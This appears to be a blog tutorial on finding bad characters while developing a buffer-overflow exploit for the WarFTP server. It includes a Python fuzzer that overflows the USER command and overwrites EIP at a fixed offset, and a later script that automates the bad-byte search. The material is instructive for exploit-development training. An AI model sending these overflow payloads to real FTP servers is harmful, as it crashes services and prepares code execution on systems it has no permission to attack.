Tuesday, 16 April 2013

Buffer overflow: find bad characters

A bad character is a byte value that the target application drops or rewrites before the input reaches memory, so a payload containing it never arrives intact and fails to run. In the debugger the corrupted part of the buffer no longer matches what was sent (in this case the changed bytes usually show up as byte 20). The classic example is \x00, which terminates a C string and cuts everything after it.

Now I will try to find the bad characters for the WarFTP application.

1 Run OllyDbg and attach it to the WarFTP process

2 Generate the byte characters with the generatecode.pl script

3 Create a fuzzer script in Python:
import socket

# the generated characters go here: every byte value 0x01..0xff from
# generatecode.pl, with \x00 already left out; remove each bad character
# found in later rounds from this string
chars = bytes(range(0x01, 0x100))

# layout of the USER argument: 485 bytes of filler, 4 bytes that land in EIP
# (0xDEADBEEF), filler up to offset 493, the test characters, then \xCC
# padding up to 1000 bytes
buffer = b"\x90" * 485
buffer += b"\xEF\xBE\xAD\xDE"
buffer += b"\x90" * (493 - len(buffer))
buffer += chars
buffer += b"\xCC" * (1000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)          # banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS ' + b'\r\n')
s.close()
print("Finish")

4 Paste the generated characters into the script line by line, leaving out the bad characters found so far. \x00 is treated as a bad character from the start (it terminates C strings), so it is never sent.

5 After the crash, right click ESP in the registers pane > Follow in Dump

6 Compare the dump with the sequence that was sent and look for the first byte that does not match (here the corrupted bytes appear as byte 20). Everything after the first corrupted byte cannot be trusted, so only one bad character can be confirmed per round.

7 Delete that character from the fuzzer script

8 Go back to step 4 and repeat until no more bad characters are found

- anomaly found at \x0a

- anomaly found at \x0d

- anomaly found at \x40 (the target did not crash)


Bad characters found so far: \x00 \x0a \x0d \x40

9 Put all the characters back into the fuzzer script, excluding the bad characters found; here is the result:

10 No more bad characters are found: the dump matches the sequence that was sent.
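The whole loop from steps 4 to 8 can be done in code instead of by eye. The script below is an added example, not part of the original post: it builds the test string minus the known bad bytes, rebuilds the USER payload with the same offsets as the fuzzer above (485 for EIP, 493 for the characters, 1000 total), parses a hex dump copied out of the debugger, reports the first byte that came back changed, and repeats until a round comes back intact. The hex dump format (address column, two-digit hex bytes, optional ASCII column) is an assumption, and fake_target is a constructed stand-in for the server that reproduces the four bad bytes reported above; it is not the real application's behaviour.

```python
import socket

# Offsets taken from the fuzzer script above: the EIP overwrite sits at 485,
# the test characters start at 493 and the whole USER argument is 1000 bytes.
EIP_OFFSET = 485
CHARS_OFFSET = 493
TOTAL_LEN = 1000
# \x00 ends a C string, so it is excluded before the first round.
DEFAULT_BAD = b"\x00"


def badchar_string(exclude=DEFAULT_BAD):
    """Every byte value 0x01..0xff minus the ones already known to be bad."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def build_payload(chars, eip=b"\xEF\xBE\xAD\xDE"):
    """Same layout as the fuzzer: filler, EIP marker, pad, test bytes, \\xCC."""
    buf = b"\x90" * EIP_OFFSET + eip
    buf += b"\x90" * (CHARS_OFFSET - len(buf))
    buf += chars
    buf += b"\xCC" * (TOTAL_LEN - len(buf))
    return buf


def send_round(host, port, chars):
    """Deliver one round to the real target through the USER command. The
    result still has to be read off the debugger's dump window (step 5) and
    fed to parse_hex_dump / first_mismatch by hand."""
    s = socket.create_connection((host, port))
    s.recv(1024)                                  # banner
    s.send(b"USER " + build_payload(chars) + b"\r\n")
    s.close()


def parse_hex_dump(text):
    """Rebuild bytes from a dump copied out of the debugger. Assumed format:
    an address column, then two-digit hex bytes, then an optional ASCII
    column, which starts at the first token that is not a two-digit hex pair."""
    hexdigits = "0123456789abcdefABCDEF"
    out = bytearray()
    for line in text.splitlines():
        for tok in line.split()[1:]:              # [1:] drops the address
            if len(tok) == 2 and all(c in hexdigits for c in tok):
                out.append(int(tok, 16))
            else:
                break
    return bytes(out)


def first_mismatch(sent, dumped):
    """Offset of the first byte that came back changed or missing, else None.
    Only the first one is meaningful: a dropped or truncating byte shifts or
    destroys everything after it, which is why the search is one byte per round."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return i
    return None


def find_bad_chars(probe, known=DEFAULT_BAD, max_rounds=16):
    """Automate steps 4-8: send the test string minus the known bad bytes,
    compare it with what the target kept in memory, add the first corrupted
    byte to the bad set, and repeat until a round comes back intact.
    `probe(chars)` must return the bytes found at ESP after sending `chars`."""
    bad = bytearray(known)
    for _ in range(max_rounds):
        chars = badchar_string(bytes(bad))
        idx = first_mismatch(chars, probe(chars))
        if idx is None:
            return bytes(bad)
        bad.append(chars[idx])
    raise RuntimeError("still finding bad characters after %d rounds" % max_rounds)


def fake_target(chars):
    """Constructed stand-in for the FTP server so the loop runs offline. It
    imitates what the post reports: \\x0a, \\x0d and \\x40 come back as byte
    0x20. This is a simulation, not the real application's behaviour."""
    return bytes(0x20 if b in b"\x0a\x0d\x40" else b for b in chars)


if __name__ == "__main__":
    found = find_bad_chars(fake_target)
    print("bad characters:", " ".join("\\x%02x" % b for b in found))
```

Against the real target, replace fake_target with a probe that calls send_round, waits for the crash, and returns parse_hex_dump of the bytes copied from the ESP dump; the comparison logic stays the same. Keep in mind that a byte which the server happens to map onto itself (for instance one that is replaced by 0x20 when it already is 0x20) will never be flagged, so the final round is still worth checking by eye.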
